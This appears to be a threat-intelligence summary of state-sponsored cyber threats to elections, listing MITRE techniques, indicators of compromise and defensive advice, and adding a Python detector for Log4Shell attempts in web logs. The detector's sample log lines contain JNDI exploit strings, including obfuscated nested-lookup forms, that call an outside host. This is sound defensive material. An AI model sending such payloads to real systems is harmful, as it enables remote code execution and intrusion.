Key points
- State-sponsored groups (e.g., Russian, Chinese, Iranian actors) are the most persistent and capable threats to election-related targets, often combining intrusion, destructive activity, and information operations.
- The election attack surface extends beyond voting machines and registries to include campaign infrastructure, media, election administrators, and third‑party service providers.
- Adversaries frequently use layered hybrid operations—network intrusion and data theft followed by DDoS, defacement, or public leak campaigns—to amplify impact.
- Observed TTPs include phishing, exploitation of internet‑exposed systems (e.g., Log4Shell), credential harvesting via spoofed domains, web shells, DDoS, wiper malware, and staged information operations (deepfakes, inauthentic news sites).
- Historical incidents: 2014 Ukraine hack/erase/deface operation (CyberBerkut / GRU overlaps), 2020 Iranian-linked voter intimidation and media compromise attempts (Emennet Pasargad), and persistent Russia-Ukraine hybrid campaigns using wipers and Telegram leak channels.
- Mitigations recommended: infrastructure hardening, patching (e.g., against CVE-2021-44228), phishing-resistant account protection (Advanced Protection Program), DDoS defenses (Project Shield), endpoint hardening, and proactive threat hunting.
- Information operations increasingly leverage AI-generated content and fictitious media brands, requiring combined technical and intelligence-driven detection and response.
MITRE Techniques
- [T1566] Phishing – Used to deliver malware and harvest credentials: ‘identify a likely TEMP.Hex phishing operation using a Taiwanese presidential-themed lure to deliver a malicious Microsoft Windows Installer (MSI) file that, when executed, delivered the SOGU.SEC backdoor.’
- [T1190] Exploit Public-Facing Application – Adversaries exploited internet-facing vulnerabilities: ‘exploited the Log4Shell vulnerability (CVE-2021-44228) to compromise a Federal Civilian Executive Branch (FCEB) organization in 2022.’
- [T1041] Exfiltration Over C2 Channel – Stolen data used to support influence operations and leaks: ‘sensitive information stolen through a network intrusion boosts the effectiveness of subsequent information operations that can leverage authentic documents.’
- [T1498] Network Denial of Service – DDoS used to disrupt services and undermine trust: ‘DDoS attacks disrupted the websites and some online services of Ukrainian government agencies and financial services organizations shortly before the advancement of Russian troops in February 2022.’
- [T1491] Defacement – Web defacements used for public-facing deception: ‘an attempted defacement of the CEC website with fake election results.’
- [T1485] Data Destruction – Wiper malware deployed to erase systems and telegraph success: ‘threat actors steal data from targeted systems, deploy wiper malware, and then telegraph the success of their operations by calling attention to the disruption and providing evidence of a compromise.’
- [T1078] Valid Accounts – Use of previously compromised accounts to publish or spread false narratives: ‘the actors allegedly attempted to log in to a previously compromised media outlet, likely to use the access to disseminate additional false information.’
Indicators of Compromise
- [Malware] observed samples and backdoors – SOGU.SEC, BROWNSPARK (and references to AIRBREAK and GOLDDRAGON.POWERSHELL in targeted campaigns).
- [File names / Lures] election-themed phishing documents – “Risk Factors on National and Local Elections 2022.docx”, “CSAFP’S_GUIDANCE_RE_NATIONAL_AND_LOCAL_ELECTION_2022_NLE.docx”.
- [Domains / Inauthentic Media] infrastructure used for IO and false attribution – “Times Newswire” and “World Newswire” subdomains and other Haixun‑hosted news sites used by HaiEnergy; leak sites/personas such as DC Leaks / Solntsepek.
- [Vulnerability] exploited public-facing flaw – CVE-2021-44228 (Log4Shell) used by UNC2448 to compromise an FCEB organization.
- [Campaign artifacts] staged media/content used in IO – video and purportedly leaked materials (e.g., election-themed videos and alleged leaked documents used by Iranian and PRC-linked campaigns).
Defensive technical guidance distilled from the report focuses on reducing the common attack surfaces and preparing for hybrid campaign patterns. Prioritize patching internet‑facing applications (notably known critical flaws such as CVE‑2021‑44228), deploy web‑application protections and monitoring for web shells, and restrict exposed services to vetted access. Implement strong email defenses and anti‑phishing controls (including URL filtering and attachment sandboxing), deploy multi‑factor and phishing‑resistant authentication for high‑risk accounts, and monitor for credential‑harvesting domains and suspicious login attempts.
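As an added illustration of the "monitoring for internet-facing applications" point above (example code written for this summary, not taken from the report): a small detector that scans web access logs for Log4Shell (CVE-2021-44228) exploitation attempts. It URL-decodes each line and folds the common `${lower:..}` / `${upper:..}` / `${..:-x}` lookup nesting that Sigma-style rules also normalize, then matches the JNDI lookup pattern. The log lines are constructed samples in combined log format; the IPs are documentation-range placeholders.

```python
import re
from urllib.parse import unquote

# Constructed sample lines (combined log format); not from the report.
SAMPLE_LOG = r'''
203.0.113.5 - - [12/Mar/2024:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2024:10:01:09 +0000] "GET /login HTTP/1.1" 200 812 "-" "${jndi:ldap://198.51.100.9:1389/a}"
203.0.113.8 - - [12/Mar/2024:10:01:15 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fexample.test%2Fx%7D HTTP/1.1" 200 64 "-" "curl/8.0"
203.0.113.9 - - [12/Mar/2024:10:01:20 +0000] "GET /api HTTP/1.1" 200 40 "-" "${${lower:j}ndi:${lower:r}mi://198.51.100.9/o}"
203.0.113.10 - - [12/Mar/2024:10:01:25 +0000] "GET /docs HTTP/1.1" 200 99 "-" "Mozilla/5.0 (Windows NT 10.0)"
'''

# Innermost lookup forms that attackers nest to evade naive string matching.
_FUNC_RE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_RE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# The JNDI lookup itself, with the protocol schemes seen in the wild.
_JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:", re.IGNORECASE)


def normalize(line: str) -> str:
    """URL-decode (a few rounds) and collapse nested lookups to their literal value."""
    for _ in range(3):
        decoded = unquote(line)
        if decoded == line:
            break
        line = decoded
    prev = None
    while prev != line:  # repeat until no nested lookup is left
        prev = line
        line = _FUNC_RE.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(), line)
        line = _DEFAULT_RE.sub(r"\1", line)
    return line


def scan_log(text: str) -> list:
    """Return one hit per log line whose normalized form carries a JNDI lookup."""
    hits = []
    for lineno, raw in enumerate(text.strip().splitlines(), 1):
        norm = normalize(raw)
        m = _JNDI_RE.search(norm)
        if m:
            # First field of combined log format is the client address.
            hits.append({"line": lineno, "src": raw.split()[0],
                         "scheme": m.group(1).lower(), "normalized": norm})
    return hits


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f"line {h['line']}: {h['src']} jndi/{h['scheme']} -> {h['normalized'][:90]}")
```

A hit on a patched host is still worth triage: it shows the source scanning for the flaw and the request path that reached the application.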
Prepare for combined-impact incidents by hardening endpoints and backups against destructive malware (wipers), adopting immutable or offline backups, and establishing rapid restoration procedures. Use DDoS mitigation and content‑distribution protections for public‑facing election services and campaign sites; instrument logging and centralized telemetry to support rapid detection and triage. Hunt for anomalous exfiltration patterns and be ready to trace leaked materials back to initial intrusion vectors to disrupt follow‑on information operations.
Operationalize intelligence-driven defenses: prioritize monitoring and countermeasures for threat actors and TTPs relevant to your region and role, exercise cross‑sector incident coordination, and enroll high‑risk personnel in phishing‑resistant protections (for example, Advanced Protection Program). Combine technical controls (patching, MFA, endpoint hardening, DDoS protection) with proactive threat hunting and media/IO monitoring to reduce the likelihood and impact of hack‑and‑leak and hybrid campaigns.
Read more: https://cloud.google.com/blog/topics/threat-intelligence/cyber-threats-global-elections/